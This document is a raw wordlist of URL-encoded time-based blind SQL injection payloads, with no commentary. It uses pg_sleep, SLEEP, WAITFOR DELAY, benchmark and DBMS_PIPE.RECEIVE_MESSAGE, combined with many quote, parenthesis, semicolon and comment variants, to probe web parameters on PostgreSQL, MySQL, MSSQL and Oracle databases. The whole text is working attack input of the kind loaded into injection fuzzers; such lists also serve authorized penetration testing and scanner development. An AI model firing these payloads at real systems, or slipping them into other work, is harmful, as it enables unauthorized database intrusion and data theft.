%20pg_sleep%285%29--%20-
%27%20pg_sleep%285%29--%20-
%22%20pg_sleep%285%29--%20-
%20SELECT%20pg_sleep%285%29--%20-
%27%20SELECT%20pg_sleep%285%29--%20-
%22%20SELECT%20pg_sleep%285%29--%20-
%20UNION%20SELECT%20pg_sleep%285%29--%20-
%27%20UNION%20SELECT%20pg_sleep%285%29--%20-
%22%20UNION%20SELECT%20pg_sleep%285%29--%20-
%20SLEEP%285%29--%20-
%27%20SLEEP%285%29--%20-
%22%20SLEEP%285%29--%20-
%20SELECT%20SLEEP%285%29--%20-
%27%20SELECT%20SLEEP%285%29--%20-
%22%20SELECT%20SLEEP%285%29--%20-
%20UNION%20SELECT%20SLEEP%285%29--%20-
%27%20UNION%20SELECT%20SLEEP%285%29--%20-
%22%20UNION%20SELECT%20SLEEP%285%29--%20-
%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%27%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%22%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%20benchmark%2850000000%2CMD5%281%29%29--%20-
%27%20benchmark%2850000000%2CMD5%281%29%29--%20-
%22%20benchmark%2850000000%2CMD5%281%29%29--%20-
%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%27%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%22%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%20pg_sleep%285%29%23
%27%20pg_sleep%285%29%23
%22%20pg_sleep%285%29%23
%20SELECT%20pg_sleep%285%29%23
%27%20SELECT%20pg_sleep%285%29%23
%22%20SELECT%20pg_sleep%285%29%23
%20UNION%20SELECT%20pg_sleep%285%29%23
%27%20UNION%20SELECT%20pg_sleep%285%29%23
%22%20UNION%20SELECT%20pg_sleep%285%29%23
%20SLEEP%285%29%23
%27%20SLEEP%285%29%23
%22%20SLEEP%285%29%23
%20SELECT%20SLEEP%285%29%23
%27%20SELECT%20SLEEP%285%29%23
%22%20SELECT%20SLEEP%285%29%23
%20UNION%20SELECT%20SLEEP%285%29%23
%27%20UNION%20SELECT%20SLEEP%285%29%23
%22%20UNION%20SELECT%20SLEEP%285%29%23
%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%22%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%27%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%22%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%20benchmark%2850000000%2CMD5%281%29%29%23
%27%20benchmark%2850000000%2CMD5%281%29%29%23
%22%20benchmark%2850000000%2CMD5%281%29%29%23
%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%27%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%22%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
pg_sleep%285%29--%20-
SELECT%20pg_sleep%285%29--%20-
UNION%20SELECT%20pg_sleep%285%29--%20-
SLEEP%285%29--%20-
SELECT%20SLEEP%285%29--%20-
UNION%20SELECT%20SLEEP%285%29--%20-
WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
benchmark%2850000000%2CMD5%281%29%29--%20-
DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
pg_sleep%285%29%23
SELECT%20pg_sleep%285%29%23
UNION%20SELECT%20pg_sleep%285%29%23
SLEEP%285%29%23
SELECT%20SLEEP%285%29%23
UNION%20SELECT%20SLEEP%285%29%23
WAITFOR%20DELAY%20%270%3A0%3A5%27%23
WAITFOR%20DELAY%20%220%3A0%3A5%22%23
benchmark%2850000000%2CMD5%281%29%29%23
DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
1%20or%20pg_sleep%285%29--%20-
1%20or%20SELECT%20pg_sleep%285%29--%20-
1%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
1%20or%20SLEEP%285%29--%20-
1%20or%20SELECT%20SLEEP%285%29--%20-
1%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
1%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
1%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
1%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
1%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
1%20or%20pg_sleep%285%29%23
1%20or%20SELECT%20pg_sleep%285%29%23
1%20or%20UNION%20SELECT%20pg_sleep%285%29%23
1%20or%20SLEEP%285%29%23
1%20or%20SELECT%20SLEEP%285%29%23
1%20or%20UNION%20SELECT%20SLEEP%285%29%23
1%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
1%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
1%20or%20benchmark%2850000000%2CMD5%281%29%29%23
1%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%20or%20pg_sleep%285%29--%20-
%27%20or%20pg_sleep%285%29--%20-
%22%20or%20pg_sleep%285%29--%20-
%20or%20SELECT%20pg_sleep%285%29--%20-
%27%20or%20SELECT%20pg_sleep%285%29--%20-
%22%20or%20SELECT%20pg_sleep%285%29--%20-
%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
%27%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
%22%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
%20or%20SLEEP%285%29--%20-
%27%20or%20SLEEP%285%29--%20-
%22%20or%20SLEEP%285%29--%20-
%20or%20SELECT%20SLEEP%285%29--%20-
%27%20or%20SELECT%20SLEEP%285%29--%20-
%22%20or%20SELECT%20SLEEP%285%29--%20-
%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
%27%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
%22%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%27%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%22%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%27%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%22%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
%27%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
%22%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%27%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%22%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%20or%20pg_sleep%285%29%23
%27%20or%20pg_sleep%285%29%23
%22%20or%20pg_sleep%285%29%23
%20or%20SELECT%20pg_sleep%285%29%23
%27%20or%20SELECT%20pg_sleep%285%29%23
%22%20or%20SELECT%20pg_sleep%285%29%23
%20or%20UNION%20SELECT%20pg_sleep%285%29%23
%27%20or%20UNION%20SELECT%20pg_sleep%285%29%23
%22%20or%20UNION%20SELECT%20pg_sleep%285%29%23
%20or%20SLEEP%285%29%23
%27%20or%20SLEEP%285%29%23
%22%20or%20SLEEP%285%29%23
%20or%20SELECT%20SLEEP%285%29%23
%27%20or%20SELECT%20SLEEP%285%29%23
%22%20or%20SELECT%20SLEEP%285%29%23
%20or%20UNION%20SELECT%20SLEEP%285%29%23
%27%20or%20UNION%20SELECT%20SLEEP%285%29%23
%22%20or%20UNION%20SELECT%20SLEEP%285%29%23
%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%27%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%22%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%27%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%22%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%20or%20benchmark%2850000000%2CMD5%281%29%29%23
%27%20or%20benchmark%2850000000%2CMD5%281%29%29%23
%22%20or%20benchmark%2850000000%2CMD5%281%29%29%23
%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%27%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%22%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%20or%20pg_sleep%285%29%3D
%27%20or%20pg_sleep%285%29%3D%27
%22%20or%20pg_sleep%285%29%3D%22
%20or%20SELECT%20pg_sleep%285%29%3D
%27%20or%20SELECT%20pg_sleep%285%29%3D%27
%22%20or%20SELECT%20pg_sleep%285%29%3D%22
%20or%20UNION%20SELECT%20pg_sleep%285%29%3D
%27%20or%20UNION%20SELECT%20pg_sleep%285%29%3D%27
%22%20or%20UNION%20SELECT%20pg_sleep%285%29%3D%22
%20or%20SLEEP%285%29%3D
%27%20or%20SLEEP%285%29%3D%27
%22%20or%20SLEEP%285%29%3D%22
%20or%20SELECT%20SLEEP%285%29%3D
%27%20or%20SELECT%20SLEEP%285%29%3D%27
%22%20or%20SELECT%20SLEEP%285%29%3D%22
%20or%20UNION%20SELECT%20SLEEP%285%29%3D
%27%20or%20UNION%20SELECT%20SLEEP%285%29%3D%27
%22%20or%20UNION%20SELECT%20SLEEP%285%29%3D%22
%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D
%27%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D%27
%22%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D%22
%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D
%27%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D%27
%22%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D%22
%20or%20benchmark%2850000000%2CMD5%281%29%29%3D
%27%20or%20benchmark%2850000000%2CMD5%281%29%29%3D%27
%22%20or%20benchmark%2850000000%2CMD5%281%29%29%3D%22
%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D
%27%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D%27
%22%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D%22
1%29%20or%20pg_sleep%285%29--%20-
1%29%20or%20SELECT%20pg_sleep%285%29--%20-
1%29%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
1%29%20or%20SLEEP%285%29--%20-
1%29%20or%20SELECT%20SLEEP%285%29--%20-
1%29%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
1%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
1%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
1%29%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
1%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
1%29%20or%20pg_sleep%285%29%23
1%29%20or%20SELECT%20pg_sleep%285%29%23
1%29%20or%20UNION%20SELECT%20pg_sleep%285%29%23
1%29%20or%20SLEEP%285%29%23
1%29%20or%20SELECT%20SLEEP%285%29%23
1%29%20or%20UNION%20SELECT%20SLEEP%285%29%23
1%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
1%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
1%29%20or%20benchmark%2850000000%2CMD5%281%29%29%23
1%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%29%20or%20pg_sleep%285%29%3D
%27%29%20or%20pg_sleep%285%29%3D%27
%22%29%20or%20pg_sleep%285%29%3D%22
%29%20or%20SELECT%20pg_sleep%285%29%3D
%27%29%20or%20SELECT%20pg_sleep%285%29%3D%27
%22%29%20or%20SELECT%20pg_sleep%285%29%3D%22
%29%20or%20UNION%20SELECT%20pg_sleep%285%29%3D
%27%29%20or%20UNION%20SELECT%20pg_sleep%285%29%3D%27
%22%29%20or%20UNION%20SELECT%20pg_sleep%285%29%3D%22
%29%20or%20SLEEP%285%29%3D
%27%29%20or%20SLEEP%285%29%3D%27
%22%29%20or%20SLEEP%285%29%3D%22
%29%20or%20SELECT%20SLEEP%285%29%3D
%27%29%20or%20SELECT%20SLEEP%285%29%3D%27
%22%29%20or%20SELECT%20SLEEP%285%29%3D%22
%29%20or%20UNION%20SELECT%20SLEEP%285%29%3D
%27%29%20or%20UNION%20SELECT%20SLEEP%285%29%3D%27
%22%29%20or%20UNION%20SELECT%20SLEEP%285%29%3D%22
%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D
%27%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D%27
%22%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D%22
%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D
%27%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D%27
%22%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D%22
%29%20or%20benchmark%2850000000%2CMD5%281%29%29%3D
%27%29%20or%20benchmark%2850000000%2CMD5%281%29%29%3D%27
%22%29%20or%20benchmark%2850000000%2CMD5%281%29%29%3D%22
%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D
%27%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D%27
%22%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D%22
1%29%29%20or%20pg_sleep%285%29--%20-
1%29%29%20or%20SELECT%20pg_sleep%285%29--%20-
1%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
1%29%29%20or%20SLEEP%285%29--%20-
1%29%29%20or%20SELECT%20SLEEP%285%29--%20-
1%29%29%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
1%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
1%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
1%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29--%20-
1%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
1%29%29%20or%20pg_sleep%285%29%23
1%29%29%20or%20SELECT%20pg_sleep%285%29%23
1%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29%23
1%29%29%20or%20SLEEP%285%29%23
1%29%29%20or%20SELECT%20SLEEP%285%29%23
1%29%29%20or%20UNION%20SELECT%20SLEEP%285%29%23
1%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
1%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
1%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29%23
1%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%29%29%20or%20pg_sleep%285%29%3D
%27%29%29%20or%20pg_sleep%285%29%3D%27
%22%29%29%20or%20pg_sleep%285%29%3D%22
%29%29%20or%20SELECT%20pg_sleep%285%29%3D
%27%29%29%20or%20SELECT%20pg_sleep%285%29%3D%27
%22%29%29%20or%20SELECT%20pg_sleep%285%29%3D%22
%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29%3D
%27%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29%3D%27
%22%29%29%20or%20UNION%20SELECT%20pg_sleep%285%29%3D%22
%29%29%20or%20SLEEP%285%29%3D
%27%29%29%20or%20SLEEP%285%29%3D%27
%22%29%29%20or%20SLEEP%285%29%3D%22
%29%29%20or%20SELECT%20SLEEP%285%29%3D
%27%29%29%20or%20SELECT%20SLEEP%285%29%3D%27
%22%29%29%20or%20SELECT%20SLEEP%285%29%3D%22
%29%29%20or%20UNION%20SELECT%20SLEEP%285%29%3D
%27%29%29%20or%20UNION%20SELECT%20SLEEP%285%29%3D%27
%22%29%29%20or%20UNION%20SELECT%20SLEEP%285%29%3D%22
%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D
%27%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D%27
%22%29%29%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D%22
%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D
%27%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D%27
%22%29%29%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D%22
%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29%3D
%27%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29%3D%27
%22%29%29%20or%20benchmark%2850000000%2CMD5%281%29%29%3D%22
%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D
%27%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D%27
%22%29%29%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D%22
%3Bpg_sleep%285%29--%20-
%3BSELECT%20pg_sleep%285%29--%20-
%3BUNION%20SELECT%20pg_sleep%285%29--%20-
%3BSLEEP%285%29--%20-
%3BSELECT%20SLEEP%285%29--%20-
%3BUNION%20SELECT%20SLEEP%285%29--%20-
%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%3BWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%3Bbenchmark%2850000000%2CMD5%281%29%29--%20-
%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%3Bpg_sleep%285%29%23
%3BSELECT%20pg_sleep%285%29%23
%3BUNION%20SELECT%20pg_sleep%285%29%23
%3BSLEEP%285%29%23
%3BSELECT%20SLEEP%285%29%23
%3BUNION%20SELECT%20SLEEP%285%29%23
%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%3BWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%3Bbenchmark%2850000000%2CMD5%281%29%29%23
%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%29%3Bpg_sleep%285%29--%20-
%29%3BSELECT%20pg_sleep%285%29--%20-
%29%3BUNION%20SELECT%20pg_sleep%285%29--%20-
%29%3BSLEEP%285%29--%20-
%29%3BSELECT%20SLEEP%285%29--%20-
%29%3BUNION%20SELECT%20SLEEP%285%29--%20-
%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%29%3Bbenchmark%2850000000%2CMD5%281%29%29--%20-
%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%29%3Bpg_sleep%285%29%23
%29%3BSELECT%20pg_sleep%285%29%23
%29%3BUNION%20SELECT%20pg_sleep%285%29%23
%29%3BSLEEP%285%29%23
%29%3BSELECT%20SLEEP%285%29%23
%29%3BUNION%20SELECT%20SLEEP%285%29%23
%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%29%3Bbenchmark%2850000000%2CMD5%281%29%29%23
%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%27%3Bpg_sleep%285%29--%20-
%22%3Bpg_sleep%285%29--%20-
%27%3BSELECT%20pg_sleep%285%29--%20-
%22%3BSELECT%20pg_sleep%285%29--%20-
%27%3BUNION%20SELECT%20pg_sleep%285%29--%20-
%22%3BUNION%20SELECT%20pg_sleep%285%29--%20-
%27%3BSLEEP%285%29--%20-
%22%3BSLEEP%285%29--%20-
%27%3BSELECT%20SLEEP%285%29--%20-
%22%3BSELECT%20SLEEP%285%29--%20-
%27%3BUNION%20SELECT%20SLEEP%285%29--%20-
%22%3BUNION%20SELECT%20SLEEP%285%29--%20-
%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%22%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%27%3BWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%22%3BWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%27%3Bbenchmark%2850000000%2CMD5%281%29%29--%20-
%22%3Bbenchmark%2850000000%2CMD5%281%29%29--%20-
%27%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%22%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%27%3Bpg_sleep%285%29%23
%22%3Bpg_sleep%285%29%23
%27%3BSELECT%20pg_sleep%285%29%23
%22%3BSELECT%20pg_sleep%285%29%23
%27%3BUNION%20SELECT%20pg_sleep%285%29%23
%22%3BUNION%20SELECT%20pg_sleep%285%29%23
%27%3BSLEEP%285%29%23
%22%3BSLEEP%285%29%23
%27%3BSELECT%20SLEEP%285%29%23
%22%3BSELECT%20SLEEP%285%29%23
%27%3BUNION%20SELECT%20SLEEP%285%29%23
%22%3BUNION%20SELECT%20SLEEP%285%29%23
%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%22%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%27%3BWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%22%3BWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%27%3Bbenchmark%2850000000%2CMD5%281%29%29%23
%22%3Bbenchmark%2850000000%2CMD5%281%29%29%23
%27%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%22%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%27%29%3Bpg_sleep%285%29--%20-
%22%29%3Bpg_sleep%285%29--%20-
%27%29%3BSELECT%20pg_sleep%285%29--%20-
%22%29%3BSELECT%20pg_sleep%285%29--%20-
%27%29%3BUNION%20SELECT%20pg_sleep%285%29--%20-
%22%29%3BUNION%20SELECT%20pg_sleep%285%29--%20-
%27%29%3BSLEEP%285%29--%20-
%22%29%3BSLEEP%285%29--%20-
%27%29%3BSELECT%20SLEEP%285%29--%20-
%22%29%3BSELECT%20SLEEP%285%29--%20-
%27%29%3BUNION%20SELECT%20SLEEP%285%29--%20-
%22%29%3BUNION%20SELECT%20SLEEP%285%29--%20-
%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%22%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%27%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%22%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%27%29%3Bbenchmark%2850000000%2CMD5%281%29%29--%20-
%22%29%3Bbenchmark%2850000000%2CMD5%281%29%29--%20-
%27%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%22%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%27%29%3Bpg_sleep%285%29%23
%22%29%3Bpg_sleep%285%29%23
%27%29%3BSELECT%20pg_sleep%285%29%23
%22%29%3BSELECT%20pg_sleep%285%29%23
%27%29%3BUNION%20SELECT%20pg_sleep%285%29%23
%22%29%3BUNION%20SELECT%20pg_sleep%285%29%23
%27%29%3BSLEEP%285%29%23
%22%29%3BSLEEP%285%29%23
%27%29%3BSELECT%20SLEEP%285%29%23
%22%29%3BSELECT%20SLEEP%285%29%23
%27%29%3BUNION%20SELECT%20SLEEP%285%29%23
%22%29%3BUNION%20SELECT%20SLEEP%285%29%23
%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%22%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%27%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%22%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%27%29%3Bbenchmark%2850000000%2CMD5%281%29%29%23
%22%29%3Bbenchmark%2850000000%2CMD5%281%29%29%23
%27%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%22%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%29%29%3Bpg_sleep%285%29--%20-
%29%29%3BSELECT%20pg_sleep%285%29--%20-
%29%29%3BUNION%20SELECT%20pg_sleep%285%29--%20-
%29%29%3BSLEEP%285%29--%20-
%29%29%3BSELECT%20SLEEP%285%29--%20-
%29%29%3BUNION%20SELECT%20SLEEP%285%29--%20-
%29%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%29%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%29%29%3Bbenchmark%2850000000%2CMD5%281%29%29--%20-
%29%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%29%29%3Bpg_sleep%285%29%23
%29%29%3BSELECT%20pg_sleep%285%29%23
%29%29%3BUNION%20SELECT%20pg_sleep%285%29%23
%29%29%3BSLEEP%285%29%23
%29%29%3BSELECT%20SLEEP%285%29%23
%29%29%3BUNION%20SELECT%20SLEEP%285%29%23
%29%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%29%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%29%29%3Bbenchmark%2850000000%2CMD5%281%29%29%23
%29%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%27%29%29%3Bpg_sleep%285%29--%20-
%22%29%29%3Bpg_sleep%285%29--%20-
%27%29%29%3BSELECT%20pg_sleep%285%29--%20-
%22%29%29%3BSELECT%20pg_sleep%285%29--%20-
%27%29%29%3BUNION%20SELECT%20pg_sleep%285%29--%20-
%22%29%29%3BUNION%20SELECT%20pg_sleep%285%29--%20-
%27%29%29%3BSLEEP%285%29--%20-
%22%29%29%3BSLEEP%285%29--%20-
%27%29%29%3BSELECT%20SLEEP%285%29--%20-
%22%29%29%3BSELECT%20SLEEP%285%29--%20-
%27%29%29%3BUNION%20SELECT%20SLEEP%285%29--%20-
%22%29%29%3BUNION%20SELECT%20SLEEP%285%29--%20-
%27%29%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%22%29%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%27%29%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%22%29%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%27%29%29%3Bbenchmark%2850000000%2CMD5%281%29%29--%20-
%22%29%29%3Bbenchmark%2850000000%2CMD5%281%29%29--%20-
%27%29%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%22%29%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%27%29%29%3Bpg_sleep%285%29%23
%22%29%29%3Bpg_sleep%285%29%23
%27%29%29%3BSELECT%20pg_sleep%285%29%23
%22%29%29%3BSELECT%20pg_sleep%285%29%23
%27%29%29%3BUNION%20SELECT%20pg_sleep%285%29%23
%22%29%29%3BUNION%20SELECT%20pg_sleep%285%29%23
%27%29%29%3BSLEEP%285%29%23
%22%29%29%3BSLEEP%285%29%23
%27%29%29%3BSELECT%20SLEEP%285%29%23
%22%29%29%3BSELECT%20SLEEP%285%29%23
%27%29%29%3BUNION%20SELECT%20SLEEP%285%29%23
%22%29%29%3BUNION%20SELECT%20SLEEP%285%29%23
%27%29%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%22%29%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%27%29%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%22%29%29%3BWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%27%29%29%3Bbenchmark%2850000000%2CMD5%281%29%29%23
%22%29%29%3Bbenchmark%2850000000%2CMD5%281%29%29%23
%27%29%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%22%29%29%3BDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%29%20or%20pg_sleep%285%29--%20-
%27%29%20or%20pg_sleep%285%29--%20-
%22%29%20or%20pg_sleep%285%29--%20-
%29%20or%20SELECT%20pg_sleep%285%29--%20-
%27%29%20or%20SELECT%20pg_sleep%285%29--%20-
%22%29%20or%20SELECT%20pg_sleep%285%29--%20-
%29%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
%27%29%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
%22%29%20or%20UNION%20SELECT%20pg_sleep%285%29--%20-
%29%20or%20SLEEP%285%29--%20-
%27%29%20or%20SLEEP%285%29--%20-
%22%29%20or%20SLEEP%285%29--%20-
%29%20or%20SELECT%20SLEEP%285%29--%20-
%27%29%20or%20SELECT%20SLEEP%285%29--%20-
%22%29%20or%20SELECT%20SLEEP%285%29--%20-
%29%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
%27%29%20or%20UNION%20SELECT%20SLEEP%285%29--%20-
